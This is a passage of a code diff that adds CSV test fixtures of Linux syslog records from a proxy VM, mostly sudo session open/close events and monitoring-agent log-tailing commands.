+43,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:11:02,squid-uk-02,2019-07-15 03:11:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+44,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:12:02,squid-uk-02,2019-07-15 03:12:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+45,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:12:59,squid-uk-02,2019-07-15 03:12:58,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+46,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:13:02,squid-uk-02,2019-07-15 03:13:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+47,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:14:02,squid-uk-02,2019-07-15 03:14:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+48,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:15:02,squid-uk-02,2019-07-15 03:15:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+49,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:15:28,squid-uk-02,2019-07-15 03:15:27,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+50,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:16:02,squid-uk-02,2019-07-15 03:16:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+51,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:17:02,squid-uk-02,2019-07-15 03:17:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+52,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:18:02,squid-uk-02,2019-07-15 03:18:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+53,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:19:02,squid-uk-02,2019-07-15 03:19:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+54,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:20:02,squid-uk-02,2019-07-15 03:20:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+55,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:21:03,squid-uk-02,2019-07-15 03:21:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+56,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:22:03,squid-uk-02,2019-07-15 03:22:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+57,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:23:03,squid-uk-02,2019-07-15 03:23:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+58,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:24:03,squid-uk-02,2019-07-15 03:24:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+59,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:25:03,squid-uk-02,2019-07-15 03:25:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+60,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:26:03,squid-uk-02,2019-07-15 03:26:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+61,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:27:03,squid-uk-02,2019-07-15 03:27:02,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+62,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:28:03,squid-uk-02,2019-07-15 03:28:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+63,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:29:03,squid-uk-02,2019-07-15 03:29:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+64,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:30:03,squid-uk-02,2019-07-15 03:30:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+65,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:30:25,squid-uk-02,2019-07-15 03:30:25,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+66,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:31:03,squid-uk-02,2019-07-15 03:31:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+67,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:32:03,squid-uk-02,2019-07-15 03:32:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+68,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:33:03,squid-uk-02,2019-07-15 03:33:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+69,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:34:03,squid-uk-02,2019-07-15 03:34:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+70,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:35:04,squid-uk-02,2019-07-15 03:35:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+71,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:36:04,squid-uk-02,2019-07-15 03:36:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+72,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:37:04,squid-uk-02,2019-07-15 03:37:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+73,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:38:04,squid-uk-02,2019-07-15 03:38:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+74,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:39:04,squid-uk-02,2019-07-15 03:39:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+75,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:40:04,squid-uk-02,2019-07-15 03:40:03,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+76,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:41:04,squid-uk-02,2019-07-15 03:41:04,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+77,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:42:04,squid-uk-02,2019-07-15 03:42:04,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
diff --git a/tests/testdata/syslog_data.csv b/tests/testdata/syslog_data.csv
new file mode 100644
index 000000000..5ce49e3a3
--- /dev/null
+++ b/tests/testdata/syslog_data.csv
@@ -0,0 +1,101 @@
+,TenantId,SourceSystem,TimeGenerated,Computer,EventTime,Facility,HostName,SeverityLevel,SyslogMessage,ProcessID,HostIP,ProcessName,MG,Type,_ResourceId
+0,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:08,squid-uk-02,7/8/2019 16:08,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+1,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:08,squid-uk-02,7/8/2019 16:08,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+2,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:08,squid-uk-02,7/8/2019 16:08,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+6,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:09,squid-uk-02,7/8/2019 16:09,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+6,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:09,squid-uk-02,7/8/2019 16:09,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/bin/bash,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+7,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:09,squid-uk-02,7/8/2019 16:09,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+8,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:09,squid-uk-02,7/8/2019 16:09,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+9,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:10,squid-uk-02,7/8/2019 16:10,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+10,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:10,squid-uk-02,7/8/2019 16:10,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+11,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:10,squid-uk-02,7/8/2019 16:10,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+12,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:18,squid-uk-02,7/8/2019 16:18,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+13,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:18,squid-uk-02,7/8/2019 16:18,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+14,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:18,squid-uk-02,7/8/2019 16:18,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+18,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:19,squid-uk-02,7/8/2019 16:19,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+19,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:19,squid-uk-02,7/8/2019 16:19,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+20,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:19,squid-uk-02,7/8/2019 16:19,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+27,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:20,squid-uk-02,7/8/2019 16:20,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+28,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:20,squid-uk-02,7/8/2019 16:20,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+29,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:20,squid-uk-02,7/8/2019 16:20,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+33,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:21,squid-uk-02,7/8/2019 16:21,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+34,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:21,squid-uk-02,7/8/2019 16:21,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+35,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 16:21,squid-uk-02,7/8/2019 16:21,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+42,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 14:41,squid-uk-02,7/8/2019 14:41,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+43,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 14:41,squid-uk-02,7/8/2019 14:41,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+44,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 14:41,squid-uk-02,7/8/2019 14:41,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+54,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 14:59,squid-uk-02,7/8/2019 14:59,authpriv,squid-uk-02,notice,omsagent : TTY=unknown   PWD=/   USER=root   COMMAND=/opt/microsoft/omsagent/ruby/bin/ruby /opt/microsoft/omsagent/plugin/tailfilereader.rb /var/log/ufw.log -p /var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.UFW_CL_b1315f05-4a7a-45b4-811f-73e715f7c122.pos,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+55,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 14:59,squid-uk-02,7/8/2019 14:59,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by (uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
+56,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,7/8/2019 14:59,squid-uk-02,7/8/2019 14:59,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02
